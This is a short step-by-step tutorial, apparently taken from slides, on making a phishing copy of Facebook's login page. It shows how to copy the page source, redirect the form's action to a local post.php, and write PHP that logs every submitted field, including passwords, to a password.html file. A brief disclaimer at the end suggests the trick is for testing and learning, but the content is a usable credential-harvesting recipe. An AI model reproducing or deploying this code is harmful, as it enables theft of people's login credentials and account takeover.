How To Make Phishing Page Of Facebook
- Open Browser. i.e. Chrome etc…
- Open your desire website (Our Example :
- Right click on it then Go to "View Page Source“ or *CTRL+U+
- Copy that Page source code by Selecting All [CTRL+A] + [Ctrl + C]
- Go to your folder & make new Notepad file & Paste that source code In that notepad
- Go to Files, Save as... Named it “index.html“ (Be sure to write html after that name)
- Once its saved then close it. Now we need to edit in that page source code
- Press CTRL+F on notepad and search for "Action" which look likes this action="“
- Delete that Facebook Link and type in there “post.php" Eg. action=“post.php“
- Now we need make another notepad and write post php code (Next Slide)
- Go to Files, Save as Named it “post.php“ (Be sure to write php after that name) & Save
php Code :-
header ('location:');
$handle = fopen("password.html", "a+");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
( this trick can be considered as crime in some countries .Therefore you should not use these tricks for hacking and cracking but can use them for testing and learning.)